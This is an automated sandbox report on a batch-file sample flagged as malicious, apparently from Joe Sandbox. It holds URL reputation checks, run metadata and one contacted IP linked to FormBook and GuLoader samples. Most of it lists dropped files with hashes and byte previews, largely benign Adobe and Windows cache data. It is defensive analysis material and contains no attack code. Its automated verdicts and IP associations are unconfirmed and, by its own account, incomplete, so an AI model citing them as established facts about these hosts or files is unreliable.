https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=98623.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=64723.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17728333.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://datatracker.ietf.org/doc/html/rfc2104.html2.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://macromates.commac.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=97573.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://discuss.python.org/c/core-dev/c-api/30stable.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=108893.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://docs.python.org/3/library/xml.sax.utils.htmlxml.sax.utils.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://pyyaml.org/3.1.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://docs.python.org/3/library/re.html#re.subcore.cpython-312.pyc.16.drfalse
  • Avira URL Cloud: safe
unknown
https://docs.python.org/3/library/weakref.htmlweakref.html.16.drfalse
  • Avira URL Cloud: safe
unknown
http://lxr.mozilla.org/mozilla-release/source/netwerk/protocol/http/nsHttpResponseHead.cpp#397heuristics.cpython-312.pyc.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/tree/3.12/Lib/unittest/mock.pyunittest.mock.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=85403.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/blob/main/Doc/library/windows.rstwindows.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://docs.python.org/3/c-api/typehints.htmltypehints.html.16.drfalse
  • Avira URL Cloud: safe
unknown
http://svn.red-bean.com/bob/macholib/trunk/macholib/fetch_macholib.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=51503.1.html.16.dr, 3.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/blob/main/Doc/tutorial/classes.rstclasses.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=61373.1.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://peps.python.org/pep-0525/glossary.html.16.dr, expressions.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://peps.python.org/pep-0307/2.3.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://www.python.org/dev/peps/pep-0566/#json-compatible-metadatainstallation_report.py.16.drfalse
  • Avira URL Cloud: safe
unknown
https://www2.cs.arizona.edu/icon/docs/ipd266.htm2.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://docs.python.org/3/howto/instrumentation.htmlinstrumentation.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://freedesktop.org/wiki/Software/xdg-user-dirs/.zunix.cpython-312.pyc.16.drfalse
  • Avira URL Cloud: safe
unknown
http://www.iana.org/time-zones/repository/tz-link.html_pydatetime.py.16.drfalse
  • URL Reputation: safe
unknown
https://setuptools.pypa.io/en/latest/references/__init__.py.16.drfalse
  • Avira URL Cloud: safe
unknown
https://peps.python.org/pep-3151/exceptions.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://pypi.org/project/zippzipfile.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=41953.1.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/blob/main/Doc/c-api/capsule.rstcapsule.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://www.tcl.tkmac.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=74613.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/blob/main/Doc/tutorial/errors.rsterrors.html.16.drfalse
  • Avira URL Cloud: safe
unknown
http://www.oreillynet.com/meerkat/xml-rpc/server.php&#39;2.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://developer.mozilla.org/en-US/docs/Web/HTTP/Caching_FAQheuristics.cpython-312.pyc.16.drfalse
  • Avira URL Cloud: safe
unknown
https://pypi.org/project/pyserial/library.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://idlefork.sourceforge.net2.3.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://peps.python.org/pep-3333/3.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
38.153.61.111
unknownUnited States
174COGENT-174USfalse
IP
127.0.0.1
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1500640
Start date and time:2024-08-28 18:58:24 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 20s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:new.bat
Detection:MAL
Classification:mal64.winBAT@25/1083@0/2
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 2
  • Number of non-executed functions: 1
Cookbook Comments:
  • Found application associated with file extension: .bat
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 20.190.160.14, 20.190.160.20, 40.126.32.138, 40.126.32.134, 40.126.32.72, 40.126.32.140, 40.126.32.68, 20.190.160.22, 184.28.88.176, 52.202.204.11, 23.22.254.206, 54.227.187.23, 52.5.13.197, 162.159.61.3, 172.64.41.3, 184.28.90.27, 2.19.126.149, 2.19.126.143, 2.16.241.7, 2.16.241.13, 88.221.168.141, 93.184.221.240, 192.168.2.9, 23.44.133.36
  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, wu.azureedge.net, a1952.dscq.akamai.net, ocsp.digicert.com, login.live.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, apps.identrust.com, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, identrust.edgesuite.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com, www.tm.lg.p
  • Execution Graph export aborted for target powershell.exe, PID 8132 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Report size getting too big, too many NtWriteFile calls found.
  • VT rate limit hit for: new.bat
TimeTypeDescription
12:59:28API Interceptor2x Sleep call for process: svchost.exe modified
12:59:32API Interceptor78x Sleep call for process: powershell.exe modified
12:59:38API Interceptor2x Sleep call for process: AcroCEF.exe modified
13:00:53API Interceptor1968x Sleep call for process: conhost.exe modified
No context
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
COGENT-174USUpdate.jsGet hashmaliciousUnknownBrowse
  • 38.180.141.42
REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
  • 38.55.112.70
factura-630.900.exeGet hashmaliciousFormBookBrowse
  • 154.23.184.240
PAGO $630.900.exeGet hashmaliciousFormBookBrowse
  • 154.23.184.240
IMG_00991ORDER_FILES.exeGet hashmaliciousFormBook, GuLoaderBrowse
  • 38.47.207.120
http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
  • 154.6.190.250
#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
  • 154.23.184.207
AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
  • 154.23.184.240
SALARY OF AUG 2024.exeGet hashmaliciousFormBookBrowse
  • 154.23.184.141
https://57365oo.cc/Get hashmaliciousPhisherBrowse
  • 38.54.80.161
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
C:\Users\user\Downloads\Python\Python312\Lib\_collections_abc.pynew.batGet hashmaliciousUnknownBrowse
    pypa.pyGet hashmaliciousUnknownBrowse
      C:\Users\user\Downloads\Python\Python312\Lib\_aix_support.pynew.batGet hashmaliciousUnknownBrowse
        pypa.pyGet hashmaliciousUnknownBrowse
          C:\Users\user\Downloads\Python\Python312\Lib\_compression.pynew.batGet hashmaliciousUnknownBrowse
            00#U2800.exeGet hashmaliciousPython StealerBrowse
              pypa.pyGet hashmaliciousUnknownBrowse
                Tool-Scan-Proxy.docGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                  erg.exeGet hashmaliciousUnknownBrowse
                    erg.exeGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.Trojan.KillProc2.18834.21003.25927.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Trojan.KillProc2.18834.21003.25927.exeGet hashmaliciousUnknownBrowse
                          bluemonster.batGet hashmaliciousUnknownBrowse
                            imagine-produs-103c3g45d4e2d22c19d3f47611e2e.BAT.batGet hashmaliciousUnknownBrowse
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1310720
                              Entropy (8bit):0.49323967080842224
                              Encrypted:false
                              SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaD:cJhXC9lHmutpJyiRDeJ/aUKrDgnmx
                              MD5:394C2AC22A3190C2DEDC1CC7EB25A454
                              SHA1:79DC2CBDC2363DC7FF4456BBD029229D545E7009
                              SHA-256:27286D95D81C35A4AA9F6920F2B8986D4E37FC35C476E7DC36E23EE3BE11732C
                              SHA-512:15BB1022D8D71F280A4F0E7E4094E07507571DFBF4FF052B99E511066DD211114D0519AE2D959EE0C245010E66CBDA285647CFDD21643616919A906C567679CA
                              Malicious:false
                              Reputation:low
                              Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                              Process:C:\Windows\System32\svchost.exe
                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x82fcbb43, page size 16384, DirtyShutdown, Windows version 10.0
                              Category:dropped
                              Size (bytes):1310720
                              Entropy (8bit):0.7217503714325568
                              Encrypted:false
                              SSDEEP:1536:cHYSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSP:cHYazaNvFv8V2UW/DLzN/w4wZi
                              MD5:B41E7F2BA3F60FBC23047F836B1DF6FC
                              SHA1:ED20F3A60CA2A85D4970558BAEAB233421AC735E
                              SHA-256:689FF899FE116C08DBAF96E21437BCF6F396663279675FAEEC167862E474EE5E
                              SHA-512:BE095985EBFB5D7A31390408DCFB8049DEA9842028FE89CB8093F1432C0E4E305BA1B809773032A404B0E93DCC7F1D1EA3B1D8CB9AD6806C69B61843D4D23415
                              Malicious:false
                              Reputation:low
                              Preview:...C... ...............X\...;...{......................p.D..........{}..;...|9.h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{................................../.!v.;...|Y.................0....;...|Y..........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):16384
                              Entropy (8bit):0.08129960370067563
                              Encrypted:false
                              SSDEEP:3:8dYeOCovgpZew/fgsCrZClW/tXg57vllllAll+SHY/Xl+/rQLve:8dzVygTewfgs3Gc//AAS4M
                              MD5:C86103BA998647DCDEF6827695FFD6A3
                              SHA1:951D18AF4A29B688D108B6B30B9C48280A0D9ACA
                              SHA-256:F405AD8CF89DABDFEF630B6D2CA23828DA1D0464C9E1BB20F06BF58CBD06C97E
                              SHA-512:3954E25A6E00AF98D5866F0D1AA226CB21163FB1E89DA92F5C02F7978C0B140EAF1032DE32B92E5DB74AB8A4F2B23C596D7E82ED161BC2355E1A9BD224598641
                              Malicious:false
                              Reputation:low
                              Preview:.T.......................................;...{...;...|Y......{}..............{}......{}.vv_Q.....{}.................0....;...|Y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):290
                              Entropy (8bit):5.247241011111807
                              Encrypted:false
                              SSDEEP:6:NHJhzDAq2PqLTwi2nKuAl9OmbnIFUt88HJhXZmw+8HJhFkwOqLTwi2nKuAl9Omb5:NHv4v8wZHAahFUt88HvX/+8HvF5TwZHi
                              MD5:70444C3EC03959F37D66F2ECC0D8ED30
                              SHA1:A135CDED5BE13E9E3A29B1994EEB479A395F0ED2
                              SHA-256:7C5957583C56A0A266306FEEA0F6B4FA609B9EEA832871BE1A888410F2BFB6FF
                              SHA-512:E002942399DE18CE10BF156FD79BEE4A43432734532768F9A11ED681EFD31F9CAC89A287FD17F9C00923517C7AACC55B0A18DBCF274BE4F577A4E5679FC938B4
                              Malicious:false
                              Preview:2024/08/28-12:59:28.315 1df0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/08/28-12:59:28.317 1df0 Recovering log #3.2024/08/28-12:59:28.317 1df0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):290
                              Entropy (8bit):5.247241011111807
                              Encrypted:false
                              SSDEEP:6:NHJhzDAq2PqLTwi2nKuAl9OmbnIFUt88HJhXZmw+8HJhFkwOqLTwi2nKuAl9Omb5:NHv4v8wZHAahFUt88HvX/+8HvF5TwZHi
                              MD5:70444C3EC03959F37D66F2ECC0D8ED30
                              SHA1:A135CDED5BE13E9E3A29B1994EEB479A395F0ED2
                              SHA-256:7C5957583C56A0A266306FEEA0F6B4FA609B9EEA832871BE1A888410F2BFB6FF
                              SHA-512:E002942399DE18CE10BF156FD79BEE4A43432734532768F9A11ED681EFD31F9CAC89A287FD17F9C00923517C7AACC55B0A18DBCF274BE4F577A4E5679FC938B4
                              Malicious:false
                              Preview:2024/08/28-12:59:28.315 1df0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/08/28-12:59:28.317 1df0 Recovering log #3.2024/08/28-12:59:28.317 1df0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):331
                              Entropy (8bit):5.188680919948501
                              Encrypted:false
                              SSDEEP:6:NHJh/4q2PqLTwi2nKuAl9Ombzo2jMGIFUt88HJhQZmw+8HJhpvDkwOqLTwi2nKuA:NHvQv8wZHAa8uFUt88HvQ/+8Hvh5TwZg
                              MD5:873A03651B4BE793C60F52F1A4E2DF08
                              SHA1:CE12F7946E9B1C1CF69DD2544C0142260D1BB012
                              SHA-256:B6CA9AC55856195A22DF40A3FFEEFCEAFA269C2804FABBB2A154613B19BEC4ED
                              SHA-512:DE6D518360920CCCD1EC5E27652FA05822FD5E158B7E538C11110EAC6FA6644AAED4BD443CE4A28CBF0D4FAB4F37CBB334F1380255DE3B56C82A3B7018CA1592
                              Malicious:false
                              Preview:2024/08/28-12:59:28.394 ac0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/08/28-12:59:28.395 ac0 Recovering log #3.2024/08/28-12:59:28.396 ac0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):331
                              Entropy (8bit):5.188680919948501
                              Encrypted:false
                              SSDEEP:6:NHJh/4q2PqLTwi2nKuAl9Ombzo2jMGIFUt88HJhQZmw+8HJhpvDkwOqLTwi2nKuA:NHvQv8wZHAa8uFUt88HvQ/+8Hvh5TwZg
                              MD5:873A03651B4BE793C60F52F1A4E2DF08
                              SHA1:CE12F7946E9B1C1CF69DD2544C0142260D1BB012
                              SHA-256:B6CA9AC55856195A22DF40A3FFEEFCEAFA269C2804FABBB2A154613B19BEC4ED
                              SHA-512:DE6D518360920CCCD1EC5E27652FA05822FD5E158B7E538C11110EAC6FA6644AAED4BD443CE4A28CBF0D4FAB4F37CBB334F1380255DE3B56C82A3B7018CA1592
                              Malicious:false
                              Preview:2024/08/28-12:59:28.394 ac0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/08/28-12:59:28.395 ac0 Recovering log #3.2024/08/28-12:59:28.396 ac0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:JSON data
                              Category:modified
                              Size (bytes):475
                              Entropy (8bit):4.962073186358444
                              Encrypted:false
                              SSDEEP:12:YH/um3RA8sq2lsBdOg2H+fcaq3QYiub5P7E4T3y:Y2sRdssdMHJ3QYhbt7nby
                              MD5:36902B8CFA3FB3B056A2C3FE8AEAE7D2
                              SHA1:507DA5187E08FA63E2B42BE0A804A4A9EAB48762
                              SHA-256:1EA37AF263561521C971CA70D7FCD58DE8488D265D3AC32FA7F973D670396095
                              SHA-512:766CB7F3B1A5E243E6F7A8E84CB716084630FC07AF336E87B2F7B21A02CD7CC7D45959E58458519133EFA0B9DA1F456C6DA67A7CC9B348EDA46BB11358A44E8F
                              Malicious:false
                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13369424374244538","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":296032},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):475
                              Entropy (8bit):4.962073186358444
                              Encrypted:false
                              SSDEEP:12:YH/um3RA8sq2lsBdOg2H+fcaq3QYiub5P7E4T3y:Y2sRdssdMHJ3QYhbt7nby
                              MD5:36902B8CFA3FB3B056A2C3FE8AEAE7D2
                              SHA1:507DA5187E08FA63E2B42BE0A804A4A9EAB48762
                              SHA-256:1EA37AF263561521C971CA70D7FCD58DE8488D265D3AC32FA7F973D670396095
                              SHA-512:766CB7F3B1A5E243E6F7A8E84CB716084630FC07AF336E87B2F7B21A02CD7CC7D45959E58458519133EFA0B9DA1F456C6DA67A7CC9B348EDA46BB11358A44E8F
                              Malicious:false
                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13369424374244538","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":296032},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3878
                              Entropy (8bit):5.226326300238761
                              Encrypted:false
                              SSDEEP:96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068Oz3SJodh:1CDLCmPj8j0/8qKgwPHYPx8xemT8Oz31
                              MD5:E9C7AD9D0944E9D611D69236534BA662
                              SHA1:3EED7340B8E5D2615A91347BDC1636AFF0450162
                              SHA-256:7C643DBD4C3A75EB90EE1B34B351E357F92BC84EF68C6844ACA03EFB5ADD1764
                              SHA-512:42D195C381AEB662EE73E2BA2A8F551BFA6A88A4D0A7CE7BAEBBD4AE552A89F727F4B39499FD99B360685C0DB841A634A11519DDAC97BAAFE8B63FD9027025A6
                              Malicious:false
                              Preview:*...#................version.1..namespace-W...o................next-map-id.1.Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.0.w..r................next-map-id.2.Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/.1:M4.r................next-map-id.3.Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/.2IE..o................next-map-id.4.Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.3KQ..^...............Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.xK.^...............Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.i.+a...............Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/Tz.qa...............Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/"_.o................next-map-id.5.Pnamespace-7c898a99_566e_4628_b4ec_
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):319
                              Entropy (8bit):5.181203776566837
                              Encrypted:false
                              SSDEEP:6:NHJhd/q2PqLTwi2nKuAl9OmbzNMxIFUt88HJhdW2JZmw+8HJhd8v7kwOqLTwi2nv:NHvNv8wZHAa8jFUt88HvU2J/+8Hvm5TQ
                              MD5:845CBAF69A463C4640AEA89691F88077
                              SHA1:42E27830BDD982867FE911FF06D6875E0C62FD14
                              SHA-256:53D8B3CB6EAA2FC34CD1D177EF14DE0367D897CD788603B9E9CB3BF710C70DFD
                              SHA-512:C16A05B1A4934AD74CC61E0B96B3C231A37194470C7DCCF7E6CD108386EE3EC9CA6BA050027035A9D4DBE110DAA7E9498616AFE5D0D9C76B0CA3A671FB9315FC
                              Malicious:false
                              Preview:2024/08/28-12:59:28.823 ac0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/08/28-12:59:28.837 ac0 Recovering log #3.2024/08/28-12:59:28.847 ac0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):319
                              Entropy (8bit):5.181203776566837
                              Encrypted:false
                              SSDEEP:6:NHJhd/q2PqLTwi2nKuAl9OmbzNMxIFUt88HJhdW2JZmw+8HJhd8v7kwOqLTwi2nv:NHvNv8wZHAa8jFUt88HvU2J/+8Hvm5TQ
                              MD5:845CBAF69A463C4640AEA89691F88077
                              SHA1:42E27830BDD982867FE911FF06D6875E0C62FD14
                              SHA-256:53D8B3CB6EAA2FC34CD1D177EF14DE0367D897CD788603B9E9CB3BF710C70DFD
                              SHA-512:C16A05B1A4934AD74CC61E0B96B3C231A37194470C7DCCF7E6CD108386EE3EC9CA6BA050027035A9D4DBE110DAA7E9498616AFE5D0D9C76B0CA3A671FB9315FC
                              Malicious:false
                              Preview:2024/08/28-12:59:28.823 ac0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/08/28-12:59:28.837 ac0 Recovering log #3.2024/08/28-12:59:28.847 ac0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 13, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 13
                              Category:dropped
                              Size (bytes):86016
                              Entropy (8bit):4.438904406982077
                              Encrypted:false
                              SSDEEP:384:SeFci5G8iBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:iQurVgazUpUTTGt
                              MD5:EE08708F7F5D51F5A68EFC0738C6B315
                              SHA1:70428C97ACD5EE41974F9BF04778FDAF2C019D69
                              SHA-256:C4F8F7E072A062C61D9A91DC45E52EF253F3D4B6DD6DC61E613DF5BD202A63B9
                              SHA-512:C45F3DE0FD9CA1FD690B8BA963217D294CA7C8CD61FF673DBCE188E68C5DE846F318A0133A357C8B60A80FAFB0BDC525AC37EC94A8A241861D69C46A2DCBA033
                              Malicious:false
                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:SQLite Rollback Journal
                              Category:dropped
                              Size (bytes):8720
                              Entropy (8bit):2.2169804389670773
                              Encrypted:false
                              SSDEEP:24:7+tUr1S6wKhpqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmfr:7MISWvqPmFTIF3XmHjBoGGR+jMz+LhT
                              MD5:1C6840A77451E0CDADE0E4BF2F8D8D60
                              SHA1:79AEC66EE2C4454E0C3A290F26FC77CE06ACDB7B
                              SHA-256:3E86148465D7F1EDE565DE47758A5FB302BDFAE287D05F70FCD5E2E9C87C78AF
                              SHA-512:AAC85599B0B390501F7D2E893E3477BF7DECE6226BDBAAB9E1988F52BE402FA8CCD33F5D8E5800252AF220E14373B69D36246C9CA2A0745948406A24DFA53313
                              Malicious:false
                              Preview:.... .c.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                              Category:dropped
                              Size (bytes):71954
                              Entropy (8bit):7.996617769952133
                              Encrypted:true
                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                              Malicious:false
